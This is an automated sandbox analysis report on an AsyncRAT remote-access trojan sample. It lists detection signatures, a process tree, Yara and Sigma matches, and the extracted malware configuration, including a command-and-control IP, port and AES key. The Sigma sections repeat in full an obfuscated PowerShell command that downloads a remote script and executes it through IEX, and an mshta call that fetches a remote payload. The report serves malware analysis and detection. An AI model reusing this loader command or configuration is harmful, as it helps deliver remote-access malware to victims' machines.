Loading ...

Play interactive tourEdit tour

Analysis Report xGrfj8RvYg.exe

Overview

General Information

Sample Name:xGrfj8RvYg.exe
Analysis ID:433020
MD5:722603aa75534bec9d1191f062fb2c03
SHA1:321ea5aa8368f394dcbdcc6ce7ebaab89861150d
SHA256:3e7cecddd88f1fdc8eb055ef6ab1eacfadb706582cb0fe190d99e493baa78691
Tags:AsyncRATexeRAT
Infos:

Most interesting Screenshot:

Detection

AsyncRAT
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AsyncRAT
Creates an undocumented autostart registry key
Injects a PE file into a foreign processes
Obfuscated command line found
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Suspicious PowerShell Command Line
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for the Microsoft Outlook file path
Sigma detected: Non Interactive PowerShell
Tries to load missing DLLs
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • xGrfj8RvYg.exe (PID: 4832 cmdline: 'C:\Users\user\Desktop\xGrfj8RvYg.exe' MD5: 722603AA75534BEC9D1191F062FB2C03)
    • mshta.exe (PID: 1276 cmdline: 'C:\Windows\System32\mshta.exe' https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txt MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
      • powershell.exe (PID: 3468 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT ='https://ia601509.us.archive.org/21/items/all-lol-123_20210603/ALL_lol123.TXT';$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS='Down^^^^^^^^^^^^^string'.Replace('^^^^^^^^^^^^^','load');$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO = 'WebBANKnt'.Replace('BANK','Clie');$T4RDTHFTJGJKHL='WFt'.Replace('WF','NE');$EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE='(NewYEAe'.Replace('YEA','-Obj');$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF='ct System.$T4RDTHFTJGJKHL.$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO).$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS($TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT)';I`E`X ($EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE,$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF -Join '')|I`E`X MD5: 95000560239032BC68B4C2FDFCDEF913)
        • conhost.exe (PID: 1564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • powershell.exe (PID: 3680 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windo 1 -noexit -exec bypass -file C:\Users\Public\-----Run+++++++++.ps1 MD5: 95000560239032BC68B4C2FDFCDEF913)
          • aspnet_compiler.exe (PID: 6396 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe MD5: 17CC69238395DF61AAF483BCEF02E7C9)
          • aspnet_compiler.exe (PID: 6800 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe MD5: 17CC69238395DF61AAF483BCEF02E7C9)
  • cleanup

Malware Configuration

Threatname: AsyncRAT

{"Server": "216.230.75.62", "Ports": "1107", "Version": "0.5.7B", "Autorun": "false", "Install_Folder": "%AppData%", "Install_File": "windonws.exe", "AES_key": "SZyWY7zJ1VdyEsSSd7sfsCsuxNXhSZI0", "Mutex": "AsyncMutex_6SI8OkPnk", "AntiDetection": "false", "External_config_on_Pastebin": "null", "BDOS": "false", "Startup_Delay": "3", "HWID": "null", "Certificate": "MIIE8jCCAtqgAwIBAgIQAMKnEVcvuQIQtAqxOy+oYTANBgkqhkiG9w0BAQ0FADAaMRgwFgYDVQQDDA9Bc3luY1JBVCBTZXJ2ZXIwIBcNMjEwNTE5MTM0ODQ1WhgPOTk5OTEyMzEyMzU5NTlaMBoxGDAWBgNVBAMMD0FzeW5jUkFUIFNlcnZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAJvrsFgFjIMG1rYF1vehk3BhjSHAlQ5Noq7MIKWRa9CgdZHCTN/Gh9VwaWUYqMuzn6F4pGWgSAmwwuuouwlMe4g37Srpvawl5ocRkOnMC4MAsh08mucPg8f/kUN3DFtqO2yfgr3i83yX9keSdfqaCRcUoXh8Qhqa5F8Mlkd2yVOcsZvmTvaLsCtRZo9YOMZ/fnPBzu2NS+xv3qaqW723pMfbrFS04iokkSp5pRQhQRWPCNJ737a0ac9gBS/g1nAuElqEl62AgbprR6YAqsbsrSDo6kOEx7t071C7gbJaO4lu33Kchi/gIC3ftleFFQhqjWTIfxcOp/kuej5DIHH9QvyE12oi1qFc8dn+EVZ2yENyQcx4NOx73zUmFh20JIMW2x4qOfuT+MkkUstDEezdXOec8PzkGMhclDzMmhD3ZA1oIGnsupJHRTTPqMHHw8tx48rj09Xv4TQARpmMffPbW+GmunkNmKHqOsMN8oj2iVwbRK7mg+UJfUyQ+hhTz/AqeWaoRGjLJVSX/R6fs2uWXX6GD8ECOxEJfnm5hLQxwr0RRwOLqu+oVMvFqOZ3+4G1UD7QIIPESId0n6EdnDCLIGuk6PqXpqR7QQU+zvRmeK6VHOH/btjAYUNkEAM6gO0Z6hk6xDeCGxXnqtr3FWyk7V9FZoi4OSzqDPvyYf849Q1nAgMBAAGjMjAwMB0GA1UdDgQWBBR2rTenBO42ADwEdSVfGFG7Id35BjAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4ICAQBkM4Am3dA31vOlVb3L4HKAuNkOPN+Iw4uslCNRYxtAc3xbiaqC8tXWcNvzNWfVdTOYjdEbo8g5+weIaD7D5vmoHzvkkyEm9+1EMMl8KcMo4I/jQmvObI74N31e43thfQb0OPP32xc3M2gRpxplMLyPGl9M22u8r5tQPo2JX/YpP5oa8gSZLo4LK2grkQLI45aGm1CWuqrpReCckH6UZOoR2EeDHf+VDcSrNQ0KJUG6tyEWWUg0FTs0hham+juKVb7Ai9ktQekAfJpAz0GGIXjd4YRwug5GabiJTbL5vW64E8q38Lz/rITER9f1Tho9r7bw9EKTGp1Q6MB9PSLHxOBeefDvpxIO6G+O8p+s7Gd5GEFDkF9z6UxVeJifhI4G2fwTz3IkbpzlZ2lBslkCy/iHGYSRDwOvhA+VDmzKXJHoW7BK1PgBQcZ2m+N8BNIHScqCanzHjQhoFMJL9f7r+/rqtJ/ranxVgK+66zGwMf6MW3u9PF93O3bln9A7Yr6dEhKReQDi0R9/qhJbqisz7Fmo8/6zn715MHHfz2pRPGlPFQKuqug8RfieY8maAZj11TUtQuOiToVFoRQHtbT1JjYQXTq++aXZA47BRKFnqmVIj+zLGHo/FkWbraZL+35yLAfwwlE/YopW+uYFcIHAHgDQhWmfD7MuiwYAY4YtNkgi5g==", "ServerSignature": "hb4rbDi2yorRia4zVii6fBe5zR5qZuT/oNzKkm5RCPxVI+DpAg6tP0HKmjqKbYbfXixb6DODIWmirNXfb6RavFFZFj5L1BSmGSCWmeVDM/IkG1v7H8053Uky0QHQ2bPzEIhio/2bZG7nxydLDiWz7jOA5hTZddxPN8Br/tFDBgOA2YvoFolDN/SyqFz61tucLLLKImugUQPB4sHE/xkAyXi1gtGQ/16xTSWjEKwIRYr/7rvSmfWpY/5oDiJvkWS/1MZAIQNLY1fyi9FRErVVeUnnTikLjZhOkouk7/QdJsJez78RuLjg+I5tTMBYhxG6q81sg7SrqotPY0sK3ZZAKaU4Vrmy1LKrBMpNQv3JiIWlI/lS56GB2bN/TA9sLcKAATEeWREuz8l/bJURfyZFk91OWqZ1mHwEXQGj5Wttm8jf+gG2TbMHgCPcpwFUFMqB7fSQIKv+pU1KOAvU64CUeLTzks4X5N8aHvduxLez78VMAyXSa2PWbv9znaxZZWCGScStHepOMiR4AXViv5F4HTb8v2nZ2x60Q0rMNmZ3T1yMA+WbdCeNBQDFD8roIU7iXGsheZ3Cfnd9MOYde+KESXBKyoZGdGoocdgu9NTzxVBAZ9fOUEXjXRfS6fh+dnAJc0GNGimVg/1EX6Q+xeKnpb2b73IU7G28wz78gQndt1Y=", "Group": "Default"}

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\Clean_lol123[1].txtwebshell_asp_obfuscatedASP webshell obfuscatedArnim Rupp
  • 0x55:$tagasp_long20: <script language="VB
  • 0xdc:$asp_payload11: WScript.Shell
  • 0xce:$asp_multi_payload_one1: CreateObject
  • 0xce:$asp_multi_payload_four1: CreateObject
  • 0xce:$asp_cr_write1: CreateObject(
  • 0x220:$m_multi_one1: Replace(
  • 0x282:$m_multi_one1: Replace(
  • 0x2af:$m_multi_one1: Replace(
  • 0x2fb:$m_multi_one1: Replace(

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000017.00000000.310047645.0000000000402000.00000040.00000001.sdmpJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
    00000017.00000002.467029735.0000000000402000.00000040.00000001.sdmpJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
      00000002.00000003.214415545.00000208942AB000.00000004.00000001.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
      • 0x90a8:$s1: pOWeRsHeLL
      00000002.00000002.217899024.0000020893D10000.00000004.00000001.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
      • 0x146:$s1: pOWeRsHeLL
      00000002.00000002.218422171.00000208942AD000.00000004.00000001.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
      • 0x70a8:$s1: pOWeRsHeLL
      Click to see the 2 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      23.2.aspnet_compiler.exe.400000.0.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
        23.0.aspnet_compiler.exe.400000.0.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: MSHTA Spawning Windows ShellShow sources
          Source: Process startedAuthor: Michael Haag: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT ='https://ia601509.us.archive.org/21/items/all-lol-123_20210603/ALL_lol123.TXT';$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS='Down^^^^^^^^^^^^^string'.Replace('^^^^^^^^^^^^^','load');$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO = 'WebBANKnt'.Replace('BANK','Clie');$T4RDTHFTJGJKHL='WFt'.Replace('WF','NE');$EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE='(NewYEAe'.Replace('YEA','-Obj');$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF='ct System.$T4RDTHFTJGJKHL.$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO).$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS($TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT)';I`E`X ($EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE,$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF -Join '')|I`E`X , CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT ='https://ia601509.us.archive.org/21/items/all-lol-123_20210603/ALL_lol123.TXT';$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS='Down^^^^^^^^^^^^^string'.Replace('^^^^^^^^^^^^^','load');$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO = 'WebBANKnt'.Replace('BANK','Clie');$T4RDTHFTJGJKHL='WFt'.Replace('WF','NE');$EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE='(NewYEAe'.Replace('YEA','-Obj');$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF='ct System.$T4RDTHFTJGJKHL.$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO).$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS($TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT)';I`E`X ($EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE,$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF -Join '')|I`E`X , CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txt, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 1276, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT ='https://ia601509.us.archive.org/21/items/all-lol-123_20210603/ALL_lol123.TXT';$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS='Down^^^^^^^^^^^^^string'.Replace('^^^^^^^^^^^^^','load');$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO = 'WebBANKnt'.Replace('BANK','Clie');$T4RDTHFTJGJKHL='WFt'.Replace('WF','NE');$EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE='(NewYEAe'.Replace('YEA','-Obj');$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF='ct System.$T4RDTHFTJGJKHL.$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO).$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS($TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT)';I`E`X ($EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE,$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF -Join '')|I`E`X , ProcessId: 3468
          Sigma detected: Suspicious PowerShell Command LineShow sources
          Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT ='https://ia601509.us.archive.org/21/items/all-lol-123_20210603/ALL_lol123.TXT';$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS='Down^^^^^^^^^^^^^string'.Replace('^^^^^^^^^^^^^','load');$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO = 'WebBANKnt'.Replace('BANK','Clie');$T4RDTHFTJGJKHL='WFt'.Replace('WF','NE');$EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE='(NewYEAe'.Replace('YEA','-Obj');$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF='ct System.$T4RDTHFTJGJKHL.$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO).$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS($TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT)';I`E`X ($EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE,$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF -Join '')|I`E`X , CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT ='https://ia601509.us.archive.org/21/items/all-lol-123_20210603/ALL_lol123.TXT';$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS='Down^^^^^^^^^^^^^string'.Replace('^^^^^^^^^^^^^','load');$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO = 'WebBANKnt'.Replace('BANK','Clie');$T4RDTHFTJGJKHL='WFt'.Replace('WF','NE');$EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE='(NewYEAe'.Replace('YEA','-Obj');$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF='ct System.$T4RDTHFTJGJKHL.$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO).$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS($TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT)';I`E`X ($EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE,$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF -Join '')|I`E`X , CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txt, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 1276, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT ='https://ia601509.us.archive.org/21/items/all-lol-123_20210603/ALL_lol123.TXT';$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS='Down^^^^^^^^^^^^^string'.Replace('^^^^^^^^^^^^^','load');$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO = 'WebBANKnt'.Replace('BANK','Clie');$T4RDTHFTJGJKHL='WFt'.Replace('WF','NE');$EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE='(NewYEAe'.Replace('YEA','-Obj');$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF='ct System.$T4RDTHFTJGJKHL.$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO).$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS($TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT)';I`E`X ($EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE,$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF -Join '')|I`E`X , ProcessId: 3468
          Sigma detected: Non Interactive PowerShellShow sources
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT ='https://ia601509.us.archive.org/21/items/all-lol-123_20210603/ALL_lol123.TXT';$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS='Down^^^^^^^^^^^^^string'.Replace('^^^^^^^^^^^^^','load');$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO = 'WebBANKnt'.Replace('BANK','Clie');$T4RDTHFTJGJKHL='WFt'.Replace('WF','NE');$EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE='(NewYEAe'.Replace('YEA','-Obj');$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF='ct System.$T4RDTHFTJGJKHL.$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO).$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS($TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT)';I`E`X ($EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE,$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF -Join '')|I`E`X , CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT ='https://ia601509.us.archive.org/21/items/all-lol-123_20210603/ALL_lol123.TXT';$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS='Down^^^^^^^^^^^^^string'.Replace('^^^^^^^^^^^^^','load');$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO = 'WebBANKnt'.Replace('BANK','Clie');$T4RDTHFTJGJKHL='WFt'.Replace('WF','NE');$EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE='(NewYEAe'.Replace('YEA','-Obj');$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF='ct System.$T4RDTHFTJGJKHL.$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO).$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS($TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT)';I`E`X ($EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE,$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF -Join '')|I`E`X , CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txt, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 1276, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT ='https://ia601509.us.archive.org/21/items/all-lol-123_20210603/ALL_lol123.TXT';$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS='Down^^^^^^^^^^^^^string'.Replace('^^^^^^^^^^^^^','load');$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO = 'WebBANKnt'.Replace('BANK','Clie');$T4RDTHFTJGJKHL='WFt'.Replace('WF','NE');$EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE='(NewYEAe'.Replace('YEA','-Obj');$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF='ct System.$T4RDTHFTJGJKHL.$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO).$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS($TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT)';I`E`X ($EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE,$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF -Join '')|I`E`X , ProcessId: 3468

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000017.00000000.310047645.0000000000402000.00000040.00000001.sdmpMalware Configuration Extractor: AsyncRAT {"Server": "216.230.75.62", "Ports": "1107", "Version": "0.5.7B", "Autorun": "false", "Install_Folder": "%AppData%", "Install_File": "windonws.exe", "AES_key": "SZyWY7zJ1VdyEsSSd7sfsCsuxNXhSZI0", "Mutex": "AsyncMutex_6SI8OkPnk", "AntiDetection": "false", "External_config_on_Pastebin": "null", "BDOS": "false", "Startup_Delay": "3", "HWID": "null", "Certificate": "MIIE8jCCAtqgAwIBAgIQAMKnEVcvuQIQtAqxOy+oYTANBgkqhkiG9w0BAQ0FADAaMRgwFgYDVQQDDA9Bc3luY1JBVCBTZXJ2ZXIwIBcNMjEwNTE5MTM0ODQ1WhgPOTk5OTEyMzEyMzU5NTlaMBoxGDAWBgNVBAMMD0FzeW5jUkFUIFNlcnZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAJvrsFgFjIMG1rYF1vehk3BhjSHAlQ5Noq7MIKWRa9CgdZHCTN/Gh9VwaWUYqMuzn6F4pGWgSAmwwuuouwlMe4g37Srpvawl5ocRkOnMC4MAsh08mucPg8f/kUN3DFtqO2yfgr3i83yX9keSdfqaCRcUoXh8Qhqa5F8Mlkd2yVOcsZvmTvaLsCtRZo9YOMZ/fnPBzu2NS+xv3qaqW723pMfbrFS04iokkSp5pRQhQRWPCNJ737a0ac9gBS/g1nAuElqEl62AgbprR6YAqsbsrSDo6kOEx7t071C7gbJaO4lu33Kchi/gIC3ftleFFQhqjWTIfxcOp/kuej5DIHH9QvyE12oi1qFc8dn+EVZ2yENyQcx4NOx73zUmFh20JIMW2x4qOfuT+MkkUstDEezdXOec8PzkGMhclDzMmhD3ZA1oIGnsupJHRTTPqMHHw8tx48rj09Xv4TQARpmMffPbW+GmunkNmKHqOsMN8oj2iVwbRK7mg+UJfUyQ+hhTz/AqeWaoRGjLJVSX/R6fs2uWXX6GD8ECOxEJfnm5hLQxwr0RRwOLqu+oVMvFqOZ3+4G1UD7QIIPESId0n6EdnDCLIGuk6PqXpqR7QQU+zvRmeK6VHOH/btjAYUNkEAM6gO0Z6hk6xDeCGxXnqtr3FWyk7V9FZoi4OSzqDPvyYf849Q1nAgMBAAGjMjAwMB0GA1UdDgQWBBR2rTenBO42ADwEdSVfGFG7Id35BjAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4ICAQBkM4Am3dA31vOlVb3L4HKAuNkOPN+Iw4uslCNRYxtAc3xbiaqC8tXWcNvzNWfVdTOYjdEbo8g5+weIaD7D5vmoHzvkkyEm9+1EMMl8KcMo4I/jQmvObI74N31e43thfQb0OPP32xc3M2gRpxplMLyPGl9M22u8r5tQPo2JX/YpP5oa8gSZLo4LK2grkQLI45aGm1CWuqrpReCckH6UZOoR2EeDHf+VDcSrNQ0KJUG6tyEWWUg0FTs0hham+juKVb7Ai9ktQekAfJpAz0GGIXjd4YRwug5GabiJTbL5vW64E8q38Lz/rITER9f1Tho9r7bw9EKTGp1Q6MB9PSLHxOBeefDvpxIO6G+O8p+s7Gd5GEFDkF9z6UxVeJifhI4G2fwTz3IkbpzlZ2lBslkCy/iHGYSRDwOvhA+VDmzKXJHoW7BK1PgBQcZ2m+N8BNIHScqCanzHjQhoFMJL9f7r+/rqtJ/ranxVgK+66zGwMf6MW3u9PF93O3bln9A7Yr6dEhKReQDi0R9/qhJbqisz7Fmo8/6zn715MHHfz2pRPGlPFQKuqug8RfieY8maAZj11TUtQuOiToVFoRQHtbT1JjYQXTq++aXZA47BRKFnqmVIj+zLGHo/FkWbraZL+35yLAfwwlE/YopW+uYFcIHAHgDQhWmfD7MuiwYAY4YtNkgi5g==", "ServerSignature": 